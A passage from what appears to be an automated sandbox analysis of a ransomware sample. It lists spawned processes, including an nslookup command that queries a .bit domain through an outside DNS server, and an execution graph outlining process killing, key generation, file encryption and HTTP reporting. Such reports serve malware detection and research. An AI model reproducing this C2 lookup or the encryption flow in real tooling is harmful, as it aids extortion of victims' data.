                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:60
                                    Start time:00:02:10
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:61
                                    Start time:00:02:11
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:30.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:41.4%
                                      Total number of Nodes:708
                                      Total number of Limit Nodes:17
                                      execution_graph 1608 404af0 1611 4048a0 Sleep 1608->1611 1654 404550 1611->1654 1614 4048c2 CreateThread 1616 4048e0 WaitForSingleObject 1614->1616 1617 40490c 1614->1617 2146 402d30 1614->2146 1615 4048ba ExitProcess 1618 404902 CloseHandle 1616->1618 1619 4048f6 TerminateThread 1616->1619 1670 404640 CreateToolhelp32Snapshot VirtualAlloc 1617->1670 1618->1617 1619->1618 1621 404911 1681 4040a0 1621->1681 1625 40491e 1626 40496c ExitProcess 1625->1626 1629 404974 1625->1629 1627 4049ae 1630 404a21 1627->1630 1631 4049d8 lstrlenA VirtualAlloc CryptStringToBinaryA 1627->1631 1629->1627 1632 404998 Sleep 1629->1632 1704 405750 1629->1704 1748 403ff0 1630->1748 1631->1630 1633 404a19 ExitProcess 1631->1633 1632->1629 1636 404a4b 1757 403de0 VirtualAlloc GetTickCount 1636->1757 1637 404a3e 1751 403fc0 1637->1751 1641 404a53 DeleteCriticalSection 1765 403a60 AllocateAndInitializeSid 1641->1765 1643 404a63 1644 404a6c VirtualAlloc 1643->1644 1769 404330 1643->1769 1646 404ab3 1644->1646 1647 404a89 GetModuleFileNameW 1644->1647 1649 404ad6 1646->1649 1650 404abc ShellExecuteW 1646->1650 1776 403ba0 1647->1776 1787 405fc0 VirtualFree VirtualFree 1649->1787 1650->1649 1653 404ade ExitProcess 1788 4039b0 GetProcessHeap 1654->1788 1656 404587 1789 406d90 1656->1789 1660 404599 VirtualAlloc 1661 4045b8 lstrcpyW lstrlenW 1660->1661 1878 4069a0 1661->1878 1664 4045e9 CreateMutexW GetLastError 1665 404601 GetLastError 1664->1665 1666 40460a VirtualFree 1664->1666 1665->1666 1904 407720 1666->1904 1671 4047d8 1670->1671 1674 4047eb 1670->1674 1672 4047e3 Process32FirstW 1671->1672 1671->1674 1672->1674 1673 404800 lstrcmpiW 1673->1674 1675 40480f OpenProcess 1673->1675 1674->1673 1677 404844 Process32NextW 1674->1677 1675->1674 1676 404821 TerminateProcess CloseHandle 1675->1676 1676->1674 1677->1674 1678 404857 1677->1678 1679 404869 FindCloseChangeNotification 1678->1679 1680 40485b VirtualFree 1678->1680 1679->1621 1680->1679 1682 4040bb 1681->1682 1683 40431c 1681->1683 1976 4039b0 GetProcessHeap 1682->1976 1701 405ef0 VirtualAlloc VirtualAlloc 1683->1701 1685 4040e6 1686 406d90 105 API calls 1685->1686 1687 4040ef 1686->1687 1688 406ba0 16 API calls 1687->1688 1689 4040f8 VirtualAlloc 1688->1689 1690 404119 1689->1690 1691 4069a0 49 API calls 1690->1691 1692 404134 1691->1692 1693 404140 lstrlenW 1692->1693 1700 404170 1693->1700 1694 404236 1696 4042d1 VirtualAlloc 1694->1696 1697 404302 VirtualFree 1694->1697 1695 4041c0 lstrcpyW lstrlenW 1695->1694 1695->1700 1696->1697 1698 4042ed wsprintfW 1696->1698 1699 407720 10 API calls 1697->1699 1698->1697 1699->1683 1700->1694 1700->1695 1977 405d80 CryptAcquireContextW 1701->1977 1985 4039b0 GetProcessHeap 1704->1985 1706 405794 1707 406d90 105 API calls 1706->1707 1708 40579d 1707->1708 1709 406ba0 16 API calls 1708->1709 1710 4057a6 VirtualAlloc 1709->1710 1711 4057de 1710->1711 1712 405c14 1711->1712 1713 40584b 6 API calls 1711->1713 1716 405c1f VirtualFree 1712->1716 1714 4058ca lstrlenA 1713->1714 1717 4058f2 lstrlenA 1714->1717 1718 407720 10 API calls 1716->1718 1721 405942 lstrlenA 1717->1721 1728 40590e lstrlenA 1717->1728 1720 405c35 1718->1720 1720->1629 1722 405971 lstrcatW lstrlenW 1721->1722 1729 40594b lstrlenA 1721->1729 1723 4069a0 49 API calls 1722->1723 1727 405999 12 API calls 1723->1727 1725 40593e 1725->1721 1730 405a3a lstrlenW 1727->1730 1728->1725 1729->1722 1986 408b30 1730->1986 1733 405a9c lstrlenA 1734 405abd 1733->1734 1735 405ad4 CryptBinaryToStringA 1734->1735 1736 405b00 GetLastError 1735->1736 1737 405b06 lstrlenA VirtualAlloc lstrlenA 1735->1737 1736->1737 1738 405b2e lstrlenA 1737->1738 1740 405b6e lstrlenA MultiByteToWideChar 1738->1740 1746 405b47 lstrlenA 1738->1746 1988 405370 1740->1988 1744 405ba6 VirtualFree VirtualFree VirtualFree 1744->1716 1745 405bd7 VirtualFree VirtualFree VirtualFree 1745->1712 1746->1740 1749 403ffd VirtualAlloc 1748->1749 1750 404018 InitializeCriticalSection 1748->1750 1749->1750 1750->1636 1750->1637 1752 403fd4 1751->1752 1753 403de0 290 API calls 1752->1753 1754 403fdc 1753->1754 2115 405fc0 VirtualFree VirtualFree 1754->2115 1756 403fe4 1756->1641 1758 403e40 GetDriveTypeW 1757->1758 1759 403e55 1758->1759 1759->1758 1760 403e5a CreateThread 1759->1760 1761 403e9e WaitForMultipleObjects GetTickCount 1759->1761 1760->1759 1762 403eff 1761->1762 2116 405540 VirtualAlloc 1762->2116 1764 403fad 1764->1641 1766 403a9a 1765->1766 1767 403a9e GetModuleHandleA GetProcAddress 1765->1767 1766->1643 1768 403ac0 FreeSid 1767->1768 1768->1643 2143 403ae0 1769->2143 1771 404344 VirtualAlloc 1773 4044fb 1771->1773 1774 4044ff GetSystemDirectoryW lstrcatW ShellExecuteW 1771->1774 1775 40452f VirtualFree 1773->1775 1774->1775 1775->1644 1777 403ae0 4 API calls 1776->1777 1778 403bb6 1777->1778 1779 403dba VirtualFree 1778->1779 1780 403a60 4 API calls 1778->1780 1779->1646 1781 403bc3 1780->1781 1781->1779 1782 403bcb ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1781->1782 1783 403da0 ShellExecuteExW 1782->1783 1784 403dc1 WaitForSingleObject CloseHandle ExitProcess 1783->1784 1785 403da7 1783->1785 1785->1783 1786 403dad VirtualFree 1785->1786 1786->1779 1787->1653 1788->1656 1790 406da9 VirtualAlloc GetUserNameW 1789->1790 1791 406dce 1789->1791 1790->1791 1792 406dd4 VirtualAlloc GetComputerNameW 1791->1792 1793 406df6 1791->1793 1792->1793 1794 406e02 VirtualAlloc 1793->1794 1795 406e56 1793->1795 1794->1795 1796 406e19 1794->1796 1797 406e60 VirtualAlloc RegOpenKeyExW 1795->1797 1798 406ef5 1795->1798 1925 406d10 RegOpenKeyExW 1796->1925 1802 406e9c RegQueryValueExW 1797->1802 1803 406ede VirtualFree 1797->1803 1799 407024 1798->1799 1800 406eff VirtualAlloc VirtualAlloc 1798->1800 1804 4070d6 1799->1804 1805 40702e VirtualAlloc RegOpenKeyExW 1799->1805 1806 406f40 wsprintfW RegOpenKeyExW 1800->1806 1808 406ec0 1802->1808 1809 406ec9 GetLastError 1802->1809 1803->1798 1813 407134 1804->1813 1814 4070dc GetNativeSystemInfo VirtualAlloc 1804->1814 1810 40706a RegQueryValueExW 1805->1810 1811 4070ac 1805->1811 1812 406f75 RegQueryValueExW 1806->1812 1819 406f97 1806->1819 1807 406e34 1807->1795 1821 406e51 wsprintfW 1807->1821 1815 406ecf RegCloseKey 1808->1815 1809->1815 1816 407097 GetLastError 1810->1816 1817 40708e 1810->1817 1820 406d10 5 API calls 1811->1820 1818 406fa0 GetLastError 1812->1818 1812->1819 1836 40714e 1813->1836 1930 407520 VirtualAlloc VirtualAlloc 1813->1930 1822 4070ff wsprintfW 1814->1822 1815->1798 1815->1803 1824 40709d RegCloseKey 1816->1824 1817->1824 1825 406fa6 RegCloseKey 1818->1825 1819->1806 1819->1825 1833 406ffd 1819->1833 1829 4070c9 wsprintfW 1820->1829 1821->1795 1822->1813 1824->1804 1824->1811 1825->1819 1830 406fb5 lstrcmpiW 1825->1830 1827 4072e9 1838 4074a0 1827->1838 1839 4072f9 VirtualAlloc 1827->1839 1828 40715f VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW RegOpenKeyExW 1831 407200 RegQueryValueExW 1828->1831 1832 40726d wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1828->1832 1829->1804 1830->1819 1837 406fc7 wsprintfW 1830->1837 1840 407225 1831->1840 1841 40722e GetLastError 1831->1841 1834 4072c2 VirtualFree 1832->1834 1835 4072ab lstrlenW 1832->1835 1842 407001 wsprintfW 1833->1842 1843 40700e VirtualFree 1833->1843 1834->1827 1835->1834 1836->1827 1836->1828 1837->1819 1844 4074a9 VirtualAlloc 1838->1844 1845 404590 1838->1845 1858 407345 1839->1858 1847 407234 RegCloseKey 1840->1847 1841->1847 1842->1843 1843->1799 1844->1845 1848 4074c7 1844->1848 1860 406ba0 1845->1860 1847->1832 1849 407243 lstrlenW 1847->1849 1948 4068f0 1848->1948 1852 406d10 5 API calls 1849->1852 1851 407370 GetDriveTypeW 1851->1858 1852->1832 1854 4074d2 VirtualFree 1854->1845 1855 407397 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1857 407471 lstrcatW 1855->1857 1855->1858 1856 407491 lstrlenW 1856->1838 1857->1858 1858->1851 1858->1855 1858->1856 1859 40740a lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1858->1859 1859->1858 1867 406bb0 1860->1867 1861 406c0a 1863 406c10 lstrlenW lstrlenW 1861->1863 1864 406c2b 1861->1864 1862 406bef lstrlenW lstrlenW 1862->1861 1863->1864 1865 406c31 lstrlenW lstrlenW 1864->1865 1866 406c4c 1864->1866 1865->1866 1868 406c52 lstrlenW lstrlenW 1866->1868 1869 406c6d 1866->1869 1867->1861 1867->1862 1868->1869 1870 406c73 lstrlenW lstrlenW 1869->1870 1871 406c8e 1869->1871 1870->1871 1872 406c94 lstrlenW lstrlenW 1871->1872 1873 406caf 1871->1873 1872->1873 1874 406cd9 1873->1874 1875 406cbe lstrlenW lstrlenW 1873->1875 1876 406ce2 lstrlenW lstrlenW 1874->1876 1877 406d07 1874->1877 1875->1874 1876->1660 1877->1660 1879 4069ba lstrcatW lstrcatW lstrcatW lstrcatW 1878->1879 1880 4069dc 1878->1880 1879->1880 1881 4069e1 lstrcatW lstrcatW lstrcatW lstrcatW 1880->1881 1882 4069fd 1880->1882 1881->1882 1883 406a03 lstrcatW lstrcatW lstrcatW lstrcatW 1882->1883 1884 406a1f 1882->1884 1883->1884 1885 406a41 1884->1885 1886 406a25 lstrcatW lstrcatW lstrcatW lstrcatW 1884->1886 1887 406a63 1885->1887 1888 406a47 lstrcatW lstrcatW lstrcatW lstrcatW 1885->1888 1886->1885 1889 406a85 1887->1889 1890 406a69 lstrcatW lstrcatW lstrcatW lstrcatW 1887->1890 1888->1887 1891 406aa7 1889->1891 1892 406a8b lstrcatW lstrcatW lstrcatW lstrcatW 1889->1892 1890->1889 1893 406ac9 1891->1893 1894 406aad lstrcatW lstrcatW lstrcatW lstrcatW 1891->1894 1892->1891 1895 406aeb 1893->1895 1896 406acf lstrcatW lstrcatW lstrcatW lstrcatW 1893->1896 1894->1893 1897 406af1 VirtualAlloc 1895->1897 1898 406b5c 1895->1898 1896->1895 1899 406b21 wsprintfW 1897->1899 1900 406b0c wsprintfW 1897->1900 1901 406b62 lstrcatW lstrcatW lstrcatW lstrcatW 1898->1901 1902 406b7e lstrlenW 1898->1902 1903 406b30 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1899->1903 1900->1903 1901->1902 1902->1664 1903->1898 1905 40773b 1904->1905 1906 40772f VirtualFree 1904->1906 1907 407741 VirtualFree 1905->1907 1908 40774d 1905->1908 1906->1905 1907->1908 1909 407753 VirtualFree 1908->1909 1910 40775f 1908->1910 1909->1910 1911 407771 1910->1911 1912 407765 VirtualFree 1910->1912 1913 407783 1911->1913 1914 407777 VirtualFree 1911->1914 1912->1911 1915 407795 1913->1915 1916 407789 VirtualFree 1913->1916 1914->1913 1917 4077a7 1915->1917 1918 40779b VirtualFree 1915->1918 1916->1915 1919 4077b9 1917->1919 1920 4077ad VirtualFree 1917->1920 1918->1917 1921 4077cb 1919->1921 1922 4077bf VirtualFree 1919->1922 1920->1919 1923 40462a 1921->1923 1924 4077d4 VirtualFree 1921->1924 1922->1921 1923->1614 1923->1615 1924->1923 1926 406d32 RegQueryValueExW 1925->1926 1927 406d7e 1925->1927 1928 406d51 RegCloseKey 1926->1928 1929 406d66 GetLastError RegCloseKey 1926->1929 1927->1807 1928->1807 1929->1807 1931 4075e2 1930->1931 1932 4075bc CreateToolhelp32Snapshot 1930->1932 1931->1836 1933 4075d4 VirtualFree 1932->1933 1934 4075ed Process32FirstW 1932->1934 1933->1931 1935 4076dd VirtualFree FindCloseChangeNotification 1934->1935 1942 40760d 1934->1942 1936 407707 1935->1936 1937 4076fd VirtualFree 1935->1937 1936->1836 1937->1936 1938 4076b7 1940 4076d5 1938->1940 1941 4076c5 lstrlenW 1938->1941 1939 407620 lstrcmpiW 1939->1942 1940->1935 1941->1940 1942->1938 1942->1939 1943 40764a lstrcpyW lstrcatW 1942->1943 1944 40765f lstrcatW lstrcatW 1942->1944 1945 407697 Process32NextW 1942->1945 1946 407670 lstrlenW 1943->1946 1944->1946 1945->1938 1947 4076a8 GetLastError 1945->1947 1946->1945 1947->1938 1947->1942 1958 4077f0 InternetOpenW 1948->1958 1952 406946 1953 406971 VirtualFree 1952->1953 1954 40694a lstrlenA 1952->1954 1956 406986 InternetCloseHandle 1953->1956 1957 40698d 1953->1957 1954->1953 1955 40695a wsprintfW 1954->1955 1955->1953 1956->1957 1957->1845 1957->1854 1959 406902 VirtualAlloc lstrlenW 1958->1959 1960 4079dd InternetOpenW 1958->1960 1961 407a00 1959->1961 1960->1959 1962 407a12 InternetCloseHandle 1961->1962 1963 407a19 1961->1963 1962->1963 1964 4077f0 2 API calls 1963->1964 1965 407a20 InternetConnectW 1964->1965 1966 407a51 VirtualAlloc wsprintfW HttpOpenRequestW 1965->1966 1967 407a48 1965->1967 1968 407aa1 HttpAddRequestHeadersW 1966->1968 1969 407b72 InternetCloseHandle InternetCloseHandle VirtualFree 1966->1969 1967->1952 1968->1969 1970 407b06 HttpSendRequestW 1968->1970 1969->1952 1971 407b6c GetLastError 1970->1971 1972 407b1d InternetReadFile 1970->1972 1971->1969 1972->1969 1973 407b3c 1972->1973 1973->1969 1974 407b47 InternetReadFile 1973->1974 1974->1973 1975 407b6a 1974->1975 1975->1969 1976->1685 1978 405dd5 CryptGenKey 1977->1978 1979 405d9f GetLastError 1977->1979 1982 405df1 1978->1982 1983 405df2 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 1978->1983 1980 405dac CryptAcquireContextW 1979->1980 1981 405dc5 1979->1981 1980->1981 1984 405dcc 1980->1984 1981->1625 1982->1983 1983->1981 1984->1978 1985->1706 1987 408b3c 1986->1987 1987->1733 1987->1987 1989 4077f0 2 API calls 1988->1989 1990 40538c 1989->1990 2006 404eb0 VirtualAlloc 1990->2006 1993 4053d3 lstrcatA lstrcatA lstrlenA 1995 408b30 _memset 1993->1995 1996 405462 lstrcpyW 1995->1996 2015 405270 VirtualAlloc GetModuleFileNameW CreateFileW 1996->2015 1998 405482 lstrlenW lstrlenA 1999 407a00 15 API calls 1998->1999 2003 4054c4 1999->2003 2000 4054f8 VirtualFree VirtualFree VirtualFree 2001 405527 InternetCloseHandle 2000->2001 2002 40552e 2000->2002 2001->2002 2002->1744 2002->1745 2003->2000 2025 405050 lstrlenA VirtualAlloc 2003->2025 2005 4054e4 2005->2000 2007 404fc0 lstrlenA VirtualAlloc VirtualAlloc 2006->2007 2008 404f2e 2006->2008 2007->1993 2009 404f52 lstrlenW VirtualAlloc 2008->2009 2010 404f47 Sleep 2008->2010 2055 404d60 CreatePipe 2009->2055 2010->2009 2012 404f78 lstrcmpiA 2013 404fa0 wsprintfW VirtualFree 2012->2013 2014 404f88 VirtualFree 2012->2014 2013->2007 2014->2008 2016 405357 VirtualFree 2015->2016 2017 4052c9 CreateFileMappingW 2015->2017 2016->1998 2018 405350 CloseHandle 2017->2018 2019 4052e1 MapViewOfFile 2017->2019 2018->2016 2020 405347 CloseHandle 2019->2020 2021 4052f7 lstrlenW lstrlenA 2019->2021 2020->2018 2022 405314 lstrlenA 2021->2022 2023 405338 UnmapViewOfFile 2021->2023 2022->2023 2023->2020 2026 40508b CryptStringToBinaryA 2025->2026 2028 4050b3 _memset 2026->2028 2029 40525e GetLastError 2026->2029 2031 4050f7 lstrlenA 2028->2031 2030 405245 VirtualFree 2029->2030 2030->2005 2032 405113 2031->2032 2084 4033e0 2032->2084 2035 405266 2094 404fd0 VirtualAlloc VirtualAlloc 2035->2094 2036 40513f 2037 405151 lstrlenA VirtualAlloc 2036->2037 2038 4051ee 2036->2038 2043 405171 CryptStringToBinaryA 2037->2043 2041 4051f5 lstrlenA VirtualAlloc 2038->2041 2042 40521a 2038->2042 2041->2042 2044 405212 lstrcpyA 2041->2044 2045 405236 2042->2045 2050 40522e HeapFree 2042->2050 2048 405194 VirtualAlloc 2043->2048 2049 4051de VirtualFree 2043->2049 2044->2042 2047 405242 2045->2047 2053 40523f HeapFree 2045->2053 2047->2030 2051 4051b0 MultiByteToWideChar 2048->2051 2052 4051ca 2048->2052 2049->2038 2050->2045 2051->2052 2054 4051d2 GetLastError 2051->2054 2052->2049 2053->2047 2054->2052 2056 404e09 SetHandleInformation 2055->2056 2057 404dff 2055->2057 2056->2057 2058 404e1f CreatePipe SetHandleInformation 2056->2058 2057->2012 2058->2057 2059 404e45 VirtualAlloc 2058->2059 2060 404e95 lstrcpyA 2059->2060 2061 404e5f wsprintfW 2059->2061 2060->2012 2066 404b10 2061->2066 2063 404e75 2071 404cb0 2063->2071 2067 408b30 _memset 2066->2067 2068 404b2e CreateProcessW 2067->2068 2069 404b84 CloseHandle CloseHandle 2068->2069 2070 404b79 GetLastError 2068->2070 2069->2063 2070->2063 2076 404cbd 2071->2076 2072 404cc6 ReadFile 2073 404d35 2072->2073 2072->2076 2074 404d53 VirtualFree 2073->2074 2077 404ba0 2073->2077 2074->2012 2076->2072 2076->2073 2078 404bcb 2077->2078 2079 404c05 lstrcpyA 2078->2079 2080 404c63 lstrlenA 2078->2080 2082 404c5d 2078->2082 2079->2074 2081 404c70 lstrcpyA 2080->2081 2081->2074 2082->2079 2098 4032b0 lstrlenA 2084->2098 2087 4034d9 ExitProcess 2089 403412 2089->2035 2089->2036 2091 403483 lstrlenA GetProcessHeap HeapAlloc 2092 403407 2091->2092 2093 4034a5 lstrcpyA 2091->2093 2092->2089 2092->2091 2102 403190 2092->2102 2106 403200 2092->2106 2093->2092 2095 405000 GetModuleFileNameW 2094->2095 2096 405039 ExitProcess 2094->2096 2095->2096 2097 405012 wsprintfW ShellExecuteW 2095->2097 2097->2096 2099 4032f8 2098->2099 2100 4032cf 2098->2100 2099->2087 2099->2092 2101 4032d0 lstrlenA 2100->2101 2101->2099 2101->2101 2103 4031b0 lstrcmpiA lstrcmpiA 2102->2103 2105 40319e 2102->2105 2103->2092 2104 4031f1 2104->2092 2105->2103 2105->2104 2108 403210 2106->2108 2107 40323d 2107->2092 2108->2107 2109 403250 lstrlenA GetProcessHeap HeapAlloc 2108->2109 2110 40326d 2108->2110 2111 40328d 2109->2111 2112 403272 lstrlenA GetProcessHeap HeapAlloc 2110->2112 2113 403299 2110->2113 2111->2113 2114 403291 lstrcpyA 2111->2114 2112->2111 2113->2092 2114->2113 2115->1756 2117 40556c wsprintfW 2116->2117 2142 4039b0 GetProcessHeap 2117->2142 2120 4055bf 2121 406d90 105 API calls 2120->2121 2122 4055ca 2121->2122 2123 406ba0 16 API calls 2122->2123 2124 4055d5 lstrlenW 2123->2124 2125 4069a0 49 API calls 2124->2125 2126 4055ed lstrlenW 2125->2126 2127 408b30 _memset 2126->2127 2128 405636 lstrlenA 2127->2128 2129 405652 2128->2129 2130 405667 CryptBinaryToStringA 2129->2130 2131 405692 lstrlenA VirtualAlloc lstrlenA 2130->2131 2132 40568c GetLastError 2130->2132 2133 4056be lstrlenA 2131->2133 2132->2131 2135 4056f2 2133->2135 2139 4056d5 lstrlenA 2133->2139 2136 405370 104 API calls 2135->2136 2138 4056fe VirtualFree 2136->2138 2140 407720 10 API calls 2138->2140 2139->2135 2141 40572d VirtualFree 2140->2141 2141->1764 2142->2120 2144 408b30 _memset 2143->2144 2145 403b37 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2144->2145 2145->1771 2167 402f50 K32EnumDeviceDrivers 2146->2167 2148 402d8c 2149 402de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2148->2149 2152 402f50 7 API calls 2148->2152 2150 402e75 ExitThread 2149->2150 2151 402e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2149->2151 2153 402ec5 ShowWindow UpdateWindow CreateThread 2151->2153 2154 402ebe ExitThread 2151->2154 2157 402d99 2152->2157 2155 402ef4 GetMessageW 2153->2155 2156 402eed CloseHandle 2153->2156 2158 402f0b 2155->2158 2159 402f3d ExitThread 2155->2159 2156->2155 2157->2149 2160 402f50 7 API calls 2157->2160 2161 402f17 TranslateMessage DispatchMessageW 2158->2161 2162 402dce 2160->2162 2161->2159 2163 402f2c GetMessageW 2161->2163 2162->2159 2177 4030a0 2162->2177 2163->2159 2163->2161 2168 402f82 VirtualAlloc 2167->2168 2169 402f7d 2167->2169 2170 402f99 2168->2170 2171 402f9f K32EnumDeviceDrivers 2168->2171 2169->2148 2170->2148 2172 402ff2 VirtualFree 2171->2172 2173 402fae 2171->2173 2172->2148 2173->2172 2174 402fc0 K32GetDeviceDriverBaseNameW 2173->2174 2174->2173 2175 402fd9 lstrcmpiW 2174->2175 2175->2173 2176 403009 VirtualFree 2175->2176 2176->2148 2178 402f50 7 API calls 2177->2178 2179 403151 2178->2179 2180 402f50 7 API calls 2179->2180 2185 402ddb 2179->2185 2181 403160 2180->2181 2182 402f50 7 API calls 2181->2182 2181->2185 2183 40316c 2182->2183 2184 402f50 7 API calls 2183->2184 2183->2185 2184->2185 2185->2159 2186 402ad0 VirtualAlloc 2185->2186 2187 402b02 GetModuleFileNameW GetTempPathW 2186->2187 2189 402b48 2187->2189 2190 402b53 lstrlenW 2189->2190 2191 402b4c 2189->2191 2201 407c60 CryptAcquireContextW 2190->2201 2230 402960 lstrlenW 2191->2230 2193 402b8e GetEnvironmentVariableW 2195 402bac 2193->2195 2197 402bd8 lstrcatW lstrcatW lstrcatW 2195->2197 2200 402bb0 2195->2200 2196 402c45 ExitThread 2213 402890 CreateFileW 2197->2213 2199 402c2f wsprintfW 2199->2191 2200->2196 2200->2199 2202 407d79 2201->2202 2203 407c8b VirtualAlloc 2201->2203 2202->2193 2205 407d82 CryptReleaseContext VirtualFree 2203->2205 2206 407cbb 2203->2206 2205->2193 2206->2205 2207 407cc3 GetModuleHandleA 2206->2207 2208 407d17 GetProcAddress 2207->2208 2209 407d09 LoadLibraryA 2207->2209 2210 407d5e 2208->2210 2212 407d26 2208->2212 2209->2208 2209->2210 2211 407d60 CryptReleaseContext VirtualFree 2210->2211 2211->2202 2212->2210 2212->2211 2214 4028b8 GetFileSize 2213->2214 2215 4028f9 2213->2215 2235 403030 2214->2235 2215->2200 2218 403030 7 API calls 2219 4028d5 CreateFileMappingW 2218->2219 2220 402902 MapViewOfFile 2219->2220 2221 4028f2 CloseHandle 2219->2221 2222 402916 2220->2222 2223 402948 CloseHandle CloseHandle 2220->2223 2221->2215 2224 403030 7 API calls 2222->2224 2223->2200 2225 40291b 2224->2225 2226 40292b 2225->2226 2240 407db0 CryptAcquireContextW 2225->2240 2251 402830 CreateFileW 2226->2251 2231 407c60 9 API calls 2230->2231 2232 4029ad RegCreateKeyExW 2231->2232 2233 402ac0 2232->2233 2234 402a8e lstrlenW RegSetValueExW RegCloseKey 2232->2234 2233->2196 2234->2196 2236 402f50 7 API calls 2235->2236 2237 40307f 2236->2237 2238 4028c8 2237->2238 2239 402f50 7 API calls 2237->2239 2238->2218 2239->2238 2241 407ea2 2240->2241 2242 407dde VirtualAlloc 2240->2242 2241->2226 2244 407e08 2242->2244 2245 407eab CryptReleaseContext VirtualFree 2242->2245 2244->2245 2246 407e11 GetModuleHandleA 2244->2246 2245->2226 2247 407e65 GetProcAddress 2246->2247 2248 407e57 LoadLibraryA 2246->2248 2249 407e89 CryptReleaseContext VirtualFree 2247->2249 2250 407e74 2247->2250 2248->2247 2248->2249 2249->2241 2250->2249 2252 40285b 2251->2252 2253 40287f UnmapViewOfFile 2251->2253 2254 402873 2252->2254 2255 40285f WriteFile 2252->2255 2253->2223 2256 402878 FindCloseChangeNotification 2254->2256 2255->2254 2255->2256 2256->2253 2257 406840 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2260 4066f0 2257->2260 2259 4068d0 VirtualFree ExitThread 2279 406110 VirtualAlloc 2260->2279 2262 406706 2263 406834 2262->2263 2291 4064a0 lstrlenW lstrcatW FindFirstFileW 2262->2291 2263->2259 2265 406715 2265->2263 2306 406640 VirtualAlloc wsprintfW CreateFileW 2265->2306 2267 406722 lstrlenW lstrcatW FindFirstFileW 2268 406764 2267->2268 2269 406758 2267->2269 2270 406770 lstrcmpW 2268->2270 2269->2259 2271 406813 FindNextFileW 2270->2271 2272 40678a lstrcmpW 2270->2272 2271->2270 2273 40682b FindClose 2271->2273 2272->2271 2274 4067a0 lstrcatW 2272->2274 2273->2263 2275 4067b3 lstrcatW 2274->2275 2278 4067cc 2274->2278 2276 4066f0 95 API calls 2275->2276 2276->2278 2278->2271 2312 4063b0 VirtualAlloc wsprintfW 2278->2312 2281 406137 2279->2281 2280 406228 VirtualFree 2280->2262 2281->2280 2282 4061a3 SHGetSpecialFolderPathW 2281->2282 2283 4061c1 SHGetSpecialFolderPathW 2282->2283 2284 4061b4 2282->2284 2285 4061db SHGetSpecialFolderPathW 2283->2285 2286 4061ce 2283->2286 2284->2280 2284->2283 2287 4061f5 SHGetSpecialFolderPathW 2285->2287 2288 4061e8 2285->2288 2286->2280 2286->2285 2289 406202 2287->2289 2290 40620f VirtualFree 2287->2290 2288->2280 2288->2287 2289->2280 2289->2290 2290->2262 2292 4064f0 lstrcmpW 2291->2292 2293 406612 FindNextFileW 2292->2293 2294 406506 lstrcmpW 2292->2294 2293->2292 2296 40662a FindClose 2293->2296 2294->2293 2295 40651c lstrcatW lstrlenW 2294->2295 2297 40653f 2295->2297 2296->2265 2297->2293 2298 406554 lstrcmpW 2297->2298 2301 4065f2 CloseHandle 2297->2301 2303 4065e1 VirtualFree 2297->2303 2304 4065c9 lstrlenA 2297->2304 2298->2297 2299 406564 CreateFileW GetFileSize 2298->2299 2300 406591 VirtualAlloc 2299->2300 2299->2301 2300->2297 2302 4065a6 ReadFile 2300->2302 2301->2296 2301->2297 2302->2297 2302->2303 2303->2297 2320 406440 lstrlenA 2304->2320 2307 40668c GetLastError 2306->2307 2308 40669e 2306->2308 2309 4066d0 VirtualFree 2307->2309 2310 4066c4 CloseHandle 2308->2310 2311 4066a7 lstrlenW WriteFile 2308->2311 2309->2267 2310->2309 2311->2310 2322 406300 2312->2322 2314 4063ea 2315 406407 VirtualFree 2314->2315 2326 406240 lstrlenW lstrlenW 2314->2326 2315->2278 2318 406403 2318->2315 2338 4035e0 GetFileAttributesW SetFileAttributesW 2318->2338 2321 40645a 2320->2321 2321->2297 2323 406313 lstrlenW 2322->2323 2324 40630c 2322->2324 2325 406325 2323->2325 2324->2314 2325->2314 2327 40625c 2326->2327 2328 40626e lstrcmpiW 2326->2328 2327->2328 2329 406283 2328->2329 2330 40628c lstrcmpiW 2328->2330 2329->2318 2330->2329 2331 406298 lstrcmpiW 2330->2331 2331->2329 2332 4062a4 lstrcmpiW 2331->2332 2332->2329 2333 4062b0 lstrcmpiW 2332->2333 2333->2329 2334 4062bc lstrcmpiW 2333->2334 2334->2329 2335 4062c8 lstrcmpiW 2334->2335 2335->2329 2336 4062d4 lstrcmpiW 2335->2336 2336->2329 2337 4062e0 lstrcmpiW 2336->2337 2337->2318 2365 405ea0 2338->2365 2341 407db0 9 API calls 2342 4036a5 2341->2342 2343 407db0 9 API calls 2342->2343 2344 4036b5 VirtualAlloc VirtualAlloc 2343->2344 2367 406000 EnterCriticalSection CryptAcquireContextW 2344->2367 2347 403976 2348 403990 VirtualFree 2347->2348 2348->2315 2349 406000 10 API calls 2350 40374a 2349->2350 2351 403751 GetLastError 2350->2351 2352 40375c 2350->2352 2351->2347 2353 40376f CreateFileW 2352->2353 2353->2347 2354 40379b VirtualAlloc VirtualAlloc 2353->2354 2355 4037d4 ReadFile 2354->2355 2356 4038e0 VirtualFree 